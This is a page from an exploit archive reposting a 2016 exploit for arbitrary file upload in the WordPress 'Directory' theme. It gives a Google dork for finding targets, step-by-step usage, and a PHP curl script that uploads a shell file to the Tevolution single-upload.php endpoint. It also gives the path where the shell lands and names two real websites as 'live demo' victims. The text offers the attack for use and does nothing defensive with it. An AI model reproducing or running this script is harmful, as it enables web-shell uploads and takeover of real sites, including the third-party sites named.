Home / os / win10

Wordpress Theme Directory Arbitrary Shell Upload Vulnerability

Posted on 30 November -0001

<HTML><HEAD><TITLE>Wordpress Theme Directory Arbitrary Shell Upload Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>######################
# Exploit Title : Wordpress Theme Directory Arbitrary Shell Upload Vulnerability
# Exploit Author : xBADGIRL21
# Dork : inurl:/wp-content/themes/Directory/
# Vendor Homepage : https://templatic.com/
# version : 2.0.16 - 2.0.14  & maybe high or lower
# Tested on: [ BackBox ]
# skype:xbadgirl21
# Date: 15/08/2016
# video Proof : https://youtu.be/eVjW6rnaoSY
######################
# [+] USAGE :
######################
# 1.- Download or Copy the Exploit C0des
# 2.- Use Dork and Choose One Of the Website 
# 3.- Edit The Script
# 4.- Upload Your File : shell.php.jpg or shell.php.txt
######################
# [+] Exploit:
######################
<?php
$uploadfile="x21.PhP.Txt";  ///xBADGIRL21 ! Removing my name Doesn't mean you are the Founder or Owner of this ^_^
$ch = curl_init("http://127.0.0.1/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('file'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?> 
######################
# [+] Dev!l Path :
######################
# http(s)://<wp-host>/<wp-path>/wp-content/themes/Directory/images/tmp/your-file-name.php.txt
######################
# [+] Live Demo :
######################
# http://guiagronicaragua.com/wp-content/themes/Directory/
# http://ilovehermanus.co.za/rv//wp-content/themes/Directory/
######################
# Discovered by : xBADGIRL21 - Unkn0wN 
# Greetz : All Mauritanien Hackers - NoWhere
#######################
### Note ### : This Exploit Been Discovered By Someone iKnow but he Don't Want me to Write His Name
# so I Just Write the Exploit C0des ...........
#######################</BODY></HTML>

 

TOP

Malware :

Exploits :